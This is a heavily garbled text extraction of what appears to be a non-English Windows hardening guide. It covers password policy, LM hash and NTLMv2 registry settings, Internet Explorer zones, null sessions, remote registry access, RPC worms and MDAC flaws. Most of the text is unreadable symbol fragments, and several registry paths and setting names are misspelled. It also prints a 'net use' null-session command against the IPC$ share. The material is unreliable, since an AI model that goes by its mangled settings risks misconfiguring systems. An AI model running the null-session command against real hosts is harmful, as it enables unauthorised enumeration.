5! $?
:
F) ?), 0, < -, <
P
!
5
" - ), .
" U4 ) = G
_, 5
#
&1$,<
minimum
" 0, 5 #P<
F) ?
, ,F
F) ?
, ,F P
!
e 'j 4
$Characters Minimum password length 0-14
T 9 %H ,/ ] , 5
-
, b
, password history
0
_ P! &
3
S
d*
Y
password history % 1 2 , 0 < ,6 *
, G %H , / $l '
,P "
6
O * password History % 1 2, 0 < ,6 *
,
6& -,
("c ) - P ? "
P! & _ u] = G
O*
<( E
6 '? @
? " 7, ?,<
5
,
6& " , E - Y ? # ) -, <
2 ƒ e 'j 4
)(E
Y " j
password age minimum
,
-, < = G
,<
H?
l '? " 7, ] L *
I
_ P! ]
)F
$ Y
I
P
!&
0 Days Minimum password age (range:0-999) ‚, < , 6 3
d*
2'
Minimum password age 0, 6
)
[
(&B
-" F ?
&
)" " ,
u
# " % PH ] , 5
)
YB*
F) minimum password age
<
# " %P
H ] 0, 5
-
P
- Y
Maximum password age (range:0-999 days)
5! Q , / $l '
$l '
5K ) 5
GX)
u ?#
0,<
5!
P
!&
2
d*
P
!&
P! &
= G
T 9 %H , / :
("c
2
?
T 9 %H , / 0
#
MR /
P
!&
0, < ? "
0 '
I
F) 7 ) X $ Y
6
"
6 , ?
0, -
4 :
2
,
- ")
, W L3
)S
0 '
$ P! &
F) 'Y< ) d *
:
, $ #P< 7 !89
6? "
2
"
3
In the domain Store password using reversible encryption for all
N& " - Y
P! &
"
K6
?
, K , @ '( E
N&
W L3
"
("c
6&
P
!& ]
6
7
$-, < DY/
0
P! &
6 @
I
- 3•0
15G
P!
l'
P
!&
"
- 3•$ ) )
K6%# ) 4
-, < K & $, 5
6&
$, 5
- Y
- Y
?, < T G'2
" - Y
0 users
$l '
2
"
4 ? 5 m .1
d*
5/ 7 # $ :
I
P
!
2 7
, 5
) )
0_
I
- 3•
( &1 I
,G
0
6&
"
6
P )
" %51
E
I
?@ " ?
K6A) "
6account "
F$ 5 - Y ?
R4
#
6 -, `4
a
P
!
b3 n 9
from Command line Promp:
Net User Username/random
6)
56] -, ` 4 ) ' L
I
P
!
P
!&
6&
- Y
6
P
GH ) ?
& cracking
("c _
P
!
P
!
) -, < I5 S
^P
6
6&
F$ P
!
, @ '"
, < ? , " ("c " E S
("c " E S
6& $l '%5G1
P account
_T 9
# $l 'A) 0 <
5 )6&
*]
-
j 5 .Y
Service accounts
Y
&5
- <\ X
6
^P
A) 2
Stand alone
?),
" U 4 0 < - Y cracking
•
F
"
GX)
2
0
P
!
C, E
5 $? "
)
l '7 B
5!
crack ? @
$
?@
P!
) -,
$
6&
0
? @ \8 9
H?@
3
I
N
? "
(, ! 0, <
/ G ;3 A
$?
b
6&
3 ?#
-, < - 3•?@
SB
g 0 <-
v 4
6%5G1
) C 3 0 <I $?
DY/
:
? @ DY/ (,! 7
?
K6% '
I
'
DY/ ) ,<
A" @ ?
3
= GX
$ K6( 4 2 `
<
$
) [
>/
?@ "
,
<
)W 3
("c ) P
!
)
6&
-, < % L
, Y 5! ( 5 -,
("c 2
K ("c
6account
F
$, 5
6A" @ ?
<•
(E
MR/
2
1E
0
6 N4
0
^P
5
6
$
5 - Y
6account &5
)
:
,
P account
)
0
2
F
? , GA
,account
#P< )
0, <
4
'
0
K
B
5F " $,
P
!&
" %P
H)S
E
$6 )
H
6
F) ? N
,<
P
!&
3
("c
P
!"
“and must be changed Your password has expired
O*
$, <
H,, e G
A" @
P! & 2 < (,! $ N
6&
,K
A
456 •
2A
N +A
,P
0 ' ,6 3
B
.
P
!
crack
("c
"]
$ P
P!
?@ ?,
6&
& $_ E
6
% <
P!
I
l '7 B
5!
$
O * - . W L3
6&
F
)
\ X
P
!&
P!
F
( E -,< DY/ 2<
( E -,< DY/ 2 <
-,< +H ) F
$
6
0
K6A) " - Y $= GX
, 5 ,H ) #.
%5G1
6&
. 7
$S
0
?
P!
craking
P
!&
B
1
I K6
&
N
:
^P
6account ? )&' I
1 -,< , K
) "
- 4 $,<
W 3 K62 )
5 ?@" - Y
0
?@ ?
(N "
K6account MR/ )
) X
3
"%
, ?@
, P4
'
account MR/ I
%L
0
S
, N)
)% !
b
- Y & $
F
P 4
-,< K
-, < K
3
- Y $, - 5 V
I
:
G 2N P
7 # " - Y
2
P$
%
/ ? 59
62 ) "
? "
# 54
:&N 0
1
6 „ 1 # 2 3@
56
1 P!
0
)?
3 -
+ $S&•
-)8! ?
$ P! &
6 & " $ #P
< 6U )
P
!&
, N $S
2, 0
0
lan
&N F
6,
& 2
LM A9(? 2A& * B •
G ;NA
8
_Version2] Ntlmv2 NT LAN Manager A) " - Y Manager
0
$, K
I
,6 3
6(& #
P )
I
#.
N& " - Y
E , B $ " T),F
a,6
?
$, 5
T
- 5 M 9
$NTMV2 v 4 |j1
LM
pqqq ) NT "), )
6=G
l ' BH
Rgistry key
Hive: HKEY_LOCAL_MACHINE
Key: System\CurrentControl Set\Control\LSA
Value: LMCompatibilityLevel
ValidRange: 0-5
Default :0
f4
Y 2
, ,
)d*
, K A) ) \ $l '
Q
4 •
a,<
7 # " & 6$NTLM ) LM A) h
v 4T
0 < 5 - Y NTMv2
NTLMV2
7 # " - Y
NTLM , K A) h
T
…p
NTMV2 , K A) h
T
…s
LM , K
;! DC
…x
) -,< NTLM ) LM , K
;! DC
…r
0
' R4 NTLMv2 , K C
'
…w
0
- Y
?
0 5 lan Manager , K i:
6
pqqq "), )
LAN
^P
0,
#4
75 I
, #4
("c :
$ Manager authentication level security: Network
I
) SP4NT "), ) $ 6
-, < S L ?@ " , G
)
? ,
U)
LM hashes T
"
5
("c 2
5 ,H ? ,
U)
NT Lan
?
E
4 ,
2
6& " - Y 7
?
I K6
$ NTLMv2
,
5 #
‡ NTLM " - Y
:
#
$, <
f4 , Controllers Domain
I
$l 'U )
0_ #P
< )
(&B
P LM
I
BH " - Y
) Y
_ {† "), )
hashing
0 5 T5! Domain Controller
0 '
6
SL " U4 0
0, <
$ 5 NTLMv2 " - Y
u?
)
6 ,
5 - Y Network Client Microsoft - 56
$, 5
?
O* S
l '
N 4] '
LMCompatibility (
,
)
Directory Services Client
?@ )
(5
NTMv2 " {† ) {r "), )
e 'j 4 7
I
2
) $ Manager authentication Level LAN
0,
)
( ,H ? @ "
Security Options ) Policies Local
O* S
pqqs ) XP "), )
) ,
I
) T G'Policy Local Security
&
•
# & XP ) pqqs $pqqq "), )
-,< K
SL
,
,
) {r "), )]
:
I
Manager,version
LMCompatibility Level
authentication level Manager
("c 0 '
U)
Send NTLMv2 Respone only\Refuse LM
I
)
), . T 5! $ :
MR / ^ P
B %K
& 2
? @ "
-
LM hashes E ? 5 TG' g
1
)-
-, < SL ? @ )
(E
2
l '7 B
5! T
$ "
) ,< ,6 *
Value on next
0
? ,
*&
•
LM hashes
& #
') #
C
'
F)
?@ " - Y
XP ) pqqs $ _
-, < E l ', B Windows 2000 Domain Controller )
5 - 3•&
LAN
- < # 2
6
E , B0
I
3•$ #P<
I
) SP2] 2000 "), )
,G
25
# GLmhash + A 1 A7T
"
) SAM
0
?#
Local Security Poclicy
,
#
0,6
$Lanman hashes $,<
E
$Xp ) pqqs "), )
& ? 5 T G' ?
0
password change Lan manager hash network security: Do not store
("c :
2
) Local Policies
6
$l '7
- <
hash LM "
0 '
# 2
#
"
I
M ,6
) T G'Policy Local Security
&
u T5! " U4 0,
O* S
Security Options
("c 0, < +H ) [
$-, < E 7
u -,< " , -
, ,F hashes LM E W L3
P
!&
- 3• :
)
("c
Y7
N 4C
'
$-,< K
6A)
F LM hashes ) 0,< , 6 3 MR/ $,6
Rgistry key
Hive: Hkey_local_Machine
Key:
System\Current ControlSet\Control\LSA\NolMHash
(E
u
3
6 & GSAM :(A
AVL + A
A
,WA
A
&
6A) " hashes
"
P
!
A
A
*& •
Hash A
AU;( + SA
A
0
6& ? )@
,
$ P
! & cracking
I
a, 5
4
"
I 2 , a #P< "
P
!
- Y
6& =
a
2
] #P<
F M, 6
- Y ethereal
0_
0-,< ˆK
6 #P< " - Y
#P
< 67
MR/ ) d *
I
, 1' pqqq ) NT4 "), )
b
< ,6 3
% '" - Y
_ C:\Winnt\System32\ Config
F) ?@
Q# ?#
"C
'
SAM % '0,< -,< " , -
?
0 )@
-
56) ), . Controllers Domain C L3
@ 78#
3
I
& Repair
F
) Lock "), )
N % !
, & 9
i: j &') SAM % ' Q
# "
("c
:
l '% '0SAM % ' Q
#
$l '% '0,<
2<
6& " ?
5!] SystemRoot%\System32\Config
C
% !
3
N 4
6
Backup
I
# &'
) -,< ' Backup 7 !89 "
0
a 5 - Y
" 7c
" ?
B5# 7 !89 R3
-
How to Disable LM Authentication on Windows NT
-
How to Enable NTLMv2 Authentication for Windows
95/98/2000/NT
-
New Registry Key to Remove LM Hashes from Active
Directory and Security Account Manager
E
! " % &#
$X
Internet Explorer (IE)
0
' ) #
?@
"), ) ( '784
N ( N ) Patch
5 $,
R4S
@^
h
IE
?
6T
R4 S @ ^
0
T#< ")
85/ ,
6
)
B
.
%
$ 6
K6 *
,6 3
"
5
IE
) ,G
F) "), )
)
K6
6
)
SB
g
" - Y 7 ) X, <
0
)
SL &
+
2 , ,F ) 2 3@ " 6)
0 < ,6 3
-,6
) IE W
F) IE
<
L3
("c
Windows U )
5
6
$, < -,
4
R4 S @ ^
- Y "), )
') #
6 &'(
/ $IE
)
,
F) ?,
0 <
?@
! ". /0(123&
)
#
6Patch
SL
#
http://windowsupdate.microsoft.com/
?
0
( E
"
) HFNetChk
" ?
,
F) '
Update Windows U )
)
#
Analyzer Microsoft
F Online
)
HS @), , e G
, < T G'
0 5
F) $, 5
C 5! ) SL
,6U )
$U#
+,
-, < - <
0 < ,6 3
)
#
) - *1 6,
)
6)
Z '?@ ,
$() *
7) Y
)
)Y
?5F
T
@^
6
Y $T G' 6
6% '
R4 S @
IE
$O) 7 Y. a I
.
#
R4S
b
l ' R4 S @ ^
Z F $0
6*
, 63
-, < ( E ? 5F
) MIME \ )
,6(E
0
$IE
)
IE -, < SL
, G 78 5/ ?
$"), ) U '
' &
$ B
.
-,< SL e 'j 4 O)
) -, < S L
" ?
2
$, < -,
6Patch
TG'update
0 5 - Y Baseline Security
Check Qualys Browser a I _O)
0 5 - Y $IE
GX)
P
)
F
&1 @
,<
6 &]
B
: )c
! " %&
IE
)
Y
- Y
)
2
-,< - <
R 4 S @ & IE 1
)
)-
5
I
#
B
! 0, Z
0, <
0
0, K5 ( N ) Z
- Y % H)
W L*
S @^
‰8
;!
("c
6patch
?@ $
6Service Pack
+ F Patch 2 3@
0 5 SL
)
("c :
&
N
'X
IE +
i.
%/
,
?
#4) I
$l '
3
7 # "
%
0, *
P
R4
#
IE
! 5E
IE
GX) ?
?@
a 5 TP
Inetnet
6%
bP
& O*
•
Custom Level ? 5 T G') Security Tab
& O*
•
4" - Y Z
T G'$
"
n 9 " Options
Tools
("c 2
0,
a <( E
%1
, $IE
"
F) (,! $
$-,< K Service Pack 2 3@
_†pp{pr]
6Patch
("c
0 5 - Y Explore 6 SP1 Internet a h @ " ?
2
F j< *
- Y 5/5IE *
4$
0
6Patch
("c
F SB
g W L3 2
$j< l ' *
- Y IE6.0 * " #
'
5
456 123&
R4 S @ ^
6*
K
P 785/ Q Zone.
R4 S @ ^
n. $ActiveX Controls ) Scripting Active
6@)7 I
l ' 6%
4"
-
) ?,<
Prompt for Allow paste operations via
& $Scripting j *
•
Clipboard n 9 "
("c
script
TG' g
I
. W L3
5 Active Scripting
0_, 5
- Y $l ' %
N4
- < # 2
4" 6
Download signed Active X Controls
O) "
Prompt
O*
("c] 0 < ( E
" ,G
& O*
$
•
Download unsigned Active X Controls
Initialize and script ActiveX Controls not
Disable
& O*
•
Disable
& O*
•
marked as safe
& $Microsoft j*
•
& $Microsoft VM j*
•
High safety for Java permissions
High safety for Java permissions
N 4) )F
6 B
4 i.
F
I
("c
0
across domains Access to data
0
TG' g Cross-site scripting
6" E
O* $
& $ Miscellaneous j *
P 785/ "
G5
^P
•
I 5 $sources
! " % &# R
Windows Remote Access Servies
#P< ^ P
)Y
-, < K
„ 1#
6%
^
6 „ 1 # ) 7 # $"), ) 7) Y
4)7 # "
-,< K
3
6 K
)
:
2
0, 5
,
6V < ? `56
$_PRC] 62 )
E
3 ')
#P
< 6 BH ) 7 #
0 3
"
) 6 '2 <
+
2
F +
GX)
, 5 ,H )
F ? &
&
3)-
3
,
"
) " g@
(, ! ) l '=GX ^
$? &
6 '? &
# l '%
< TP,
" 7,
F
-
)
3"
+
V <S
,
7 L
?5F
b
?@ "
?#
K
%
b
<R V <
) CIFS File
) - "
4_
(E
,
b
?&
)
K6 *
_
-
<
) F
"), )
)
,5
I ] 6h) ) ) 6
/ 6
!
DY/
- Y "
W L3
) P
Q M ,6 l '?
6% '
T
$ #P< V < S
? ,
_
)
#P
<
,
# 4 (, ! % 1
,
B
.
# 4 (,! % 1
, 1
)-
3 7 / pqqw T
"
2,
? &
" - Y
$ #P< V < i.
0, <
S
7 B
5! ( E ?# $l ' 6%# ) 4 0,<
CH ] 0, 5
F 7 # "
% '" - Y Z
-
$,
l '+
System Common Internet )
"
456 Q -NETBIOS
H #P<
#P< ? &
7 B
5!
"
- 5 6 '$?@
P l '(& # (SMB Block Message Server)]
%# ) 4
(
,G 7 5F
0
!
" - Y
)
6 '&
^P
K6 , 1' ) % 'V < ?# $"), ) % !
-, < <R V <
0
Logon NULL
6i
:< 8 Y
^P
6
) -
) "), )
4 6 3 $l '
5/ ) K
#P< 6%# ) 4 Q
Anonymous $7 B
F $NETBIOS #P<
) - "
6*
0, 5
0, 5
("c %
4 $ #P
<
E
6@
) 6 , 1' 3
) 6
I]
6 ' #P< ?
)
F +
2 < ) ?, 3 ?#
$ < ( E #P<
-, < <R V <
+
0 ' ,6 3 j6
. " : 7, ,
"
"
3
$ 3 ? #56
<R V <
P
,
)- Y Z
_ 6% '
#4 #
0
:3 )
Logon Anonymouse
Null Session
85! $Session
C
P
!& )( ]
l89 $_ 13Null Session
" 0
6U )
0
- Y
6
)
"), )NT ? G $Local System account
E n 9 " #P<
? G
$bP
7
L
6
A R4
3
:
l'
0, 5
Null Session
H$
$ P
H
^P
Local
,K
1/
6*
I5
Z F
0
*
?# $
"
%1
,
1
), 5
5 6 '
u ? # $pqqq "), ) " % P
H 6*
KN* 4
Session Null pqqq "), )
2 ) 6'
,
_
&
+
R
1
:
${†"), )CE $NT $pqqq $ME ) XP B B &
) 6N
,
,
# 4 $ &'(
- P< 7 5 I
H
0
)
- Y $? , 6 native
A R 4Null Session )
6
$?
)Z F B
.
0, 5
%#
$ 6-)
Z F computer account Local U )
H ) 6 'pqqq "), ) " % P
H
]
<+
I5
) pqqqLocal System account )
#
3
7 !89 j 5
null Session "), ) 0, 5
6U )
6U )
Computer " $,
bP
P! ?), -,< E
1
6,
F)
I5
)
? @ ) 6 '? 5F
,6 3O *
Z
,
<
-,
6" E 0, 5
b
E
!89
E
- Y
"
$ P
75 I
) - "
23 , - 9*5 ) l ' GX) " - Y Z
:&27 RPC Remote Procedure Calls:[
"
] "), )
6*
" , GNT $pqqq $XP (& #
"
9P I nter process
Z F T/
) - " ) N ?&
0
' 7
F ,
3 '
)
3 - *1 ,
0_ B
.
F
\ " 785/ ( E
3
H F
- Y
)
,G 785/ ?
0,<
H F
2
Blaster/Msblast/Lovsan )
6" E - 5 ] 0
Nachi/ Welchia " - Y
0, 5
H $? &
$l ' R 4 S @ : " - Y
) - " ?&
6(
2
" _pqqs $
0, -
- Y l ' R4 S @ : "
Dos
R4 S @ ^
!
^P
$
RPC0
! ") *
0,
+,
H,, 2 e G
+
%K
bP
:
R4 S @ d *
7c #< d *
I5
% 'V < U )
?#
F
?
$l '
5
&
- .NETBIOS
T L.
&'Afentis security 0,<
A8 " %P
H 7 !89
#B
5! - . "
)@ +5F I 5
6@
2
a
0, 5
$
-,< h PH
NAT ("c
NETBIOS $, L
W L3
:
,G " ? NETBIOS - Y
"
Netbios Auditing Tool (
-,< K ) W L*
^
6*
! ". /0(123&
0 5 NAT 7 5B "
b
"), )
6
B
/
$
)
#)
" ) (E
- Y $% '
h @ " http:// www. Afentis. Com/resources/win32/nat - Y
0 5
" ,
v2.11 Legion N
${† ) {Š "), ) ?
% 'V <Legion b
" ,
-,< K Rhino9 #P< V <
$pqqq "),
)?
Checker)Security Fridays Share ? ,
) {† ${Š
6*
] "), )CE S @ d *
0,
U)
4 *
GX)
5 - Y
I5 _
SPC)Password
% 'V <
? # $l '
2 3@ ]
I5
0, 5 - Y _
R4Level password share "), ) ?
^P
NT ? @ )
] sp4 $pqqq $_,< -,< SL XP
Baseline Security Advisor S @ ? & W L3
:
R4SMB 0, 5 l '%#
)
0, 5
B
. ? &
"), ) ?
)
? 5 M 9
?
$pqqs )
("c A & R3
)- Y
( ,H $
R4 S @
" - Y Share net , 5 -,6
€" ?
" ,
6
)
( E ) - " ? & NT $pqqq $XP
0
$l '
<+
^P
6'
B5# 7 !89 "
,
pqqs )
1$
b3 n 9 " )
6@
]Net Share/ $
0_ 5 - Y
0
-, < K
' j
$
<+
<+
T 5! )
^P
6( E ],<
7 !89 S
a
‰8
- Y
" 7c
)
7
<
"), )
<+
W 3
<+ …
)% ' ^ P
$
:
u
!89 1 2
6( E " %P
H$
F) 1
)
I 5 0_ < ( E
" ?
u
1/ +
6@C
8
<+
7
?,
("c 2
W L3
L
7
u
u $-,6
$ I - .…
:
" ) - 3•…
3
6" E MR /
P
!&
DY/ ) -,< -
)
6 ,1'XP
"), )
< ,1'
V < ? 5 TG' g - .…
"), )XP
V <
"), )
a
6" E
6*
, N ) 6% '
"
6
- .…NTFS
<+
^P
e 'j 4
6" E
"), )…NT "), ) ) pqqq "), ) $XP S L " % P
H ] SP1 " E
$_
"7 L
Everyone 7 L ) Control Full0, <
"), )…XP ? @ )
SP1 " E
-, < SL Everyone )
$
7 L Read0,<
"), )…xp (
e 'j 4 7 L Sharedocs
<
User s/ Documents and settings/All C: /Documents " E
]
_
Everyone 7 L ) Full Control0,<
d *
H
+
Open Share
"
GX)
I5 +
" ?
"), )
GX)
# 0_, <
I5 $ F
5 ?N
) 25 $?N SMB
6*
5
6
<+
^P
R4 S @ ^
- Y % H
?@
:
d *
3
], <
File Sharing %K
^
Gibson Research Corporation " ?
&
"
6 N 4 SB
g
bP
2
I5
)
R4 S @
0 5
'
j 4
6&
a 5 - Y
…Nessus0 ) - " - Y
I5 -
) -,< ( N $?N j 4 &
a
…Winfingerprint N 4 aWin32 Host/Network Enumeration
A
A
:
+ A! A". /A
0(12A
3&Logon Anonymouse 9A
I 5 G?" \N( Anonymouse Logon
R4 S @
null Session0 K5
TG'$
b3 n 9 " ) "
$
" - Y
From Command Line Prompt:
C:/>net use// ipaddress/ipc$""/user:""
< +P
TL
? G ) -,<anonymouse
P
! & Null
$l '
-, < 'N I
System error 5
F " U4 #
'
F
Ipaddress d *
?@ ( ] user/:”
)_
hidden interprocess communications
E ]
H $l ' R 4 S @ : e G
& @
IPC$
E ;! $l '
P
4 $l '
)-
F) (, ! -, 6,
2 (E
F " U4 #
$
0_
n.
I 5 ("c " E
0 < ,6 *
=GX 2 %
R 4 S @ -, 6,
]% P
Hj *
-, <
'G
Winfingerpirnt d *
$+ A R
6 &'(
1
j 5 .Y
" 0
)
Nessus )
, 63
& _Null Session0 5 - Y $
I5 ?
A
$ <-
: A
A
A
+ A! A ". /A
0(12A
3&
NT
NTRK)(Resource
( regdump.
K F % ' % <$ ' ) #
n 9"
"), ) ? & NT
h @" ?
E
b3
+
&
:
XP
%
-)8! 0, 5
http://www. Afentis. Com/top20
0 5 - Y & _
]
F
#P< )
6&
K<@
I5 $
6
! ". /0(123&RPC
]
' ) #
Secutity Analyzer
I 5 A) 2
h @ n 9" ?
l'
9
Microsoft Baseline
$l '
0
-M2A
" - Y 0
-
K $
R4 S @ d *
http://www.
Microsoft.
Com/technet/security/tools/Tools/MBSAhom. Asp0 5
! "
'
456 123&
DY/ - .NETBIOSa
bP 785/ %
- Y ^
-
) pqqq $NT )
$ B
3
Patch-cheking , hotfix (
2
% H$
6" E TG' g 7 L
I "), ) ? &
$l ' &
n 9" h
7 , , j6
I5
,G
6 #6 " ?
:
2
a 5
5 ?@ " - Y
) X #
sharing ? 5 T G' g
0,<
CE ) {† ${Š "), ) ? ,
* ? G
User-Level share access control 7
U)
4
L $, <
NT "), ) Dmain "
0,
6% 'V < 0
0
) FTP n 9 "
? # $sharing " - Y
C
'
,6 3
sharing $S
?@
N
n 9 " b' -,< <R V <
&1 P
!& z
0, K5
, 1'
6 , 1'?
? &
7 ) X7
2 , 0, 6 ( E " E ) -,< , K ?
0
#4
sharing ? 5 T G' g
)
HTTP
R4 7
+
$S
? &
,
$
< +P " - Y
I5
Sharing
), . C
'
$7 ) X 7
)(E
,1'
:
0 <R V <
h @
sharing ?# ?
),.
0_,<
("c R 1$
?@ " $
E
<
$
DNS
F) ,
-, < K
u
S X j &' I 5
E
u
a 5 - Y
"
:
:
2
6
!89 $ 1 2
6T 5! " % PHBackup 7
" ?# $7 ) X Restore " ?
] ,E
?# ] 0 5 ip
#
-, < '
0,<
<
F) ? @ _
!89 +
"), )
NT "), )
F ? 5 Restore ) $j
F i
) $ Backup - .
4.0
F ? 5 Restore ) j
) $ Backup - .
F ? 5 Restore ) j
) $ Backup - .
pqqq "), )
) XP "), )
pqqs "), )
"), ) 7
L
, " Null sessions
" #
&
K6
2
NT Domain Controllers $, -, < ,
0
Windows NT Domain
pqqq "), ) " % P
H
6*
,63
3"
7 9P
#4
I5
pqqs|pqqq "), )
?# ]
-,< Z F P
)
1/
b
2#5
I
!89 ?& ?
,<
<
F)
I 2
F Restrict Anonymouse 9
$ pqqq "), )
6
$
•
"
- Y $_ , 5
5
1
) j6
6%
4) 6
#
h
), . T 5!
a 5 - Y
" 7c
"
5 $
,
I5 0
MR /
,6 3 )
7 !89 R3 null session " ?
:
$
! 5E
Anonymouse ?
"), )
- Y ?5F
T@ -, % / - 0,
- Y pqqsRestrict Anonymouse
, $
6 '
7 !89 K
),. T5!
NT
Restrict Anonymouse
"), )
F
,
" - Y
- .
pqqq
F
a 5 - Y
"
, Restrict Anonymouse 2 #< ;!
F
Domain 0
6, B
"), ) ?
%
bP
0,
DY/ - .
6" E )
$Service Pack 3
E
$l ', ,
" ()&17
SL "
u
:
E
u
] ,E
" ?# $7 ) X 7
"
)
7
$
" ?
-,<restore
:
)
E
-,<Backup
("c R1$
0, <
<
2
"), )
I5
/ )NT 4.0
E
0, < 2t5: $
6T5! " %PH
!89 +
3
u( E " %P
H 3
!89 $ 1 2
?@ " $
a 5 - Y
2#5 Trust
pqqq "), )
E
K
I 5 Restrict Anonymouse 1 " ?
, $ K " T#<
E i
NT 4.0 "), )
E ? 5 Resroe ) $j
) $ Backup - .
pqqq "), )
E•? 5 Restore ) j
) $ Backup - .
"
'
F) ? @ _
) XP "), )
E ? 5 Restore ) j
) $ Backup - .
pqqs "), )
n 9"
a K5
E
TP
), . T 5!
E ,B
E
I5
I 5 a #P<
" %/
), .
$ #P<
create the following Registry key
HKEY_LOCAL_MACHINE\SYSTEM\Current controlset\control
Secure PipeServers\winreg
Description:REG_SZ
Value:Registry server
- "
" F)
K 6)
j 4 7 5 I $"), ) SL ? "
0, 5
$l ', B e 'Access Control List
]
,
6)
" %/
$
a K5
)?
d*
3
$l ', B
,<
B
E
),. T5!
E
6" E ) 7 "
, Backup Operators
)
6" E
) Regedit32.exe ]
I5 , B
E
E
F
a, B 2 '
F E F
HKEY_LOCAL_MACHINE\SYSTEM\Current
ControlSet\Control
Edit
n 9 " Add Key
a "
Enter the following values:
Key Name: Secure PipeServers
Class: REG_SZ
a, B 2 '
F E F
-
H _ pqqq "), )
TP
_ regedit.exe
)
& O*
z
0,6
HKEY_LOCAL_MACHINE\SYSTEM\Current
controlSet\Control\Secure PipeServers
Edit
n 9 " Add Key
& O*
a "
z
Enter the following values:
Key Name: winreg
Class: REG_SZ
a,B 2 '
F E F
HKEY_LPCAL_MACHINE\SYSTEM\Current
ControlSet\Control\SecureServers\winreg
Edit
n 9 " Add Key
& O*
a "
z
Enter the following valuses:
Value Name: Description
Data Type: REG_SZ
String: registry server
a, B 2 '
F E F
HKEY_LOCAL_MACHINE\SYSTEM\Current
ControlSet
\Control\SecurePipeServers\winreg
0 Permissions
" E Z :!
) Security )
B $ winreg O *
I5 " E
)?
6-)
?
1/ 2
0 5 'X
( E 7 5 I ?, < T G' I 5 ) z 3 Registry Editor
0, K5
", -
E
"
$-,<
F)
0 5
E
#
1 u ,LH
-,< - < B
/ 2 3@ ?
^P
I
"E ?
)
i
$,<
<
), . T 5! a-,< , K ) - "
6U )
:
"
("c
6" E "
3 i: ?
, B
? @? 5 d*
AllowedPaths
^
]
5 =
Machine
G
2
$
0,<
E
< TP, $
account name U )
1 Z F T/ winreg T5! (,!
,B
),. T5!
P F7 [ ,
Directory Replicator ) service printer Spooler :
? )&'
#
^
I 5 "), ) , # 4
3
6, B
)$
), .
) Users a_
Bypass the access restriction:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Control\
SecurePipeServers\winreg\Allowedpaths
Value:
Machine
Value
Type:
REG_MULTI_SZ
-
Multi
string
Default
Data:
system\CurrentControlSet\Control\productOptionsSystem\
CurrentControlSet\Control\print\print\printersSystem\CurrentCont
rolSet\
Services\Event logSo ftware\Microsoft\windows NT\Current V
ersionSystem\
Current Contro lSet\Services\Replicator
Valid Range: (A valid path to a location in the registry)
Description: Allow machines access to listed locations in the
Registry provided that no explicit access restrictions exist for that
location.
Value:
Users
Value
type:
REG_MULTI_SZ
Default
-
Multi
string
Data:
Vaild Range:
(A
valid
(none)
path
to
a
location
in
the
registry)
Description:
Allow
users
access
to
listed
locations
in
The registry provided that no explicit access restrictions exist for that
location.
DY/ - .RPC
bP %K %
SL
:
2
A) 2
Windows Update ? 5 TG' g
#B
5!
^ P
Patch b
I
,G
), . T 5!
6MBSA
-, < K
6A)
:
)RPC h @ " - Y
http://www.ntbugtrag.com/dcomrpc.asp ("c 0, < , Y ,
- .
:
),. T5!
#B
5!RPC 2
U4 ) (E
#
?# Patch
B
5!
$
"), ) U )
g
0 5 T 5!
bP
) ? 5 TG' g
"
3 I
B
67
7
)
4
? '
<,
0
F)
2
# 2
" ;! ,
u,
? @ $ #B
5! .
$, <
,<
:
- <
3
2
F)
)
$
4
" ? 59 "
? 5 RPC
^
^
Š{s ) ‹‹Š ) ws{ ) wsŠ
‹‹Š ) wsŠ$ws}$ws†UDP0 5 V8
) "), )
$ R4 S @ :
a 5 - Y
67
"
:
!89 +
E
4 ] "), )TCP
67
4)
_
),. T5! - .
K<@
I
-, < - <Windows remote Access Servivces
" ?
Security Bulletin Service & Hotfix Microsofts
editor windows server 2003 Registry) XP "), ) " - Y - .
access: Remotely accessible registry paths and subpaths
Network
Server 2003 Security Guide windows
! " % &# 08
Microsoft Data Acces Components
(MDAC)
MDAC
S @^
!89
" - Y
R4 MDAC
?5F
bP
0
" ,
-,< '
) 6, "
$l '785/ 0, 5 - Y _O * 7
a 5 - <
"2
E
B % !)
"
H
# $"), )
:
?
! E % <$
3
2
6*
"
,G
,G 785/ ?
), Z F]
6 # ) " - Y RDS
I ] 5 ,H
6 „1# "
3 M ,6
1
) ,<
<
F
$
R4 S @
,G % c ,
-,< K 7c L.
, ,F %K
F) ) _
overflow buffer - 9 *5
F
5 $
0 ",
RDS 7 5B "
MDAC $ "
S
Remote Data Services 5 , H *
H
) - " ?
0, 5 Z F $
, 7"
$
=GX
) 6" E - 5
78#
) 6=GX 0_
?@
B
F
* ] s) Š MS Access
!89
6
GX) 2 3@
6
T
3" 6
R4 S @ $_
6 ' ,G 7, ,
" j ) -,< 3 < %
5 ,H
R4 S @ B % c " $ 6
0,<
Microsoft jet
" ) j &'
]
I 5 ("c 7 ,
)-
B
. 7 L
=GX - 5 l '=GX Microsoft jet Database
Database Engine "
-, < h PH
6
F) 0
S
: $l '
-,< K )
, # 4 (,!
)- # (N
F
) 6, "
0, -,
!
785/ l '=GX " - Y
3 785/ "
# Buffer Oveflow
?
?5F
(E
%1
, $ :
- 5<
MDAC0,<
P
3]21 MSO3-033 *
_
5
R4 S @ : 2
0
MDAC
-, < - < ?@
$pqqs "), )
' ) #
$() *
"), )
IIS
Q NT
6
)
T)J) $ RDS
) j<
l'
6*
=GX
SQL " MDAC
0, <
6*
] SP2$_
Q$ <
l ' R4 S @ :
+
‹) q
$,< -,< SL w)Š
) pqqq O), ) 0,< XP - 5 ] pqqqU '@? @ )
* SQL Server 7 ? @ )
?@ )
, 56SPI $_
K6
-, < SL , G ) Server 2000
-,6
N 560, 5
- Y
"), )
! ". /0(123&
"), )
)
% ' F) W L3
NT 4.0 - 5 IIS SL
#
)
*
$,< -,< masdcs. Dll” % '] < ( E
("c
C 5! l 'files\Common files\System\msadc\msacds.dll c:\program
h @
#
0_, < 7) Y
) "
,
#4
F
2#5 l 'h @ $
patching 2
( N $,< l '% '% < I
% ! 6
) 5 ,H
7 K
&F "
6 @
6 &'(
I5 0 < , 6 3
F) 7
0
H$
: $
(E ?
HS @),, e G
$-,< - <
("c
3
" ?
(
:
W
(N
W L3 MDAC- 5<
R4 S @ ^
2
0 5 - Y
L3
("c
( ,H
F b < S
)(E
R4 S @d *
2<
)
0
-,< i
3
-, < SL
6 &'
456 123&
:
RDS $Jet " ?
? @
h @http://www.wiretrip.net/rfp/txt/rfp9907.txt &
DY/)
I5 &
"
! " %&
6=GX
' ) # Windows update
$l '? # 0 5 - Y $
0 5 ,6 3 6 &'(
MS03-033
21 " ?
- .?@
R4 S @ : 2 %
_
B ) i.L - . )
' ) #
P
3]2 1 2,
0 5 - Y
:
2
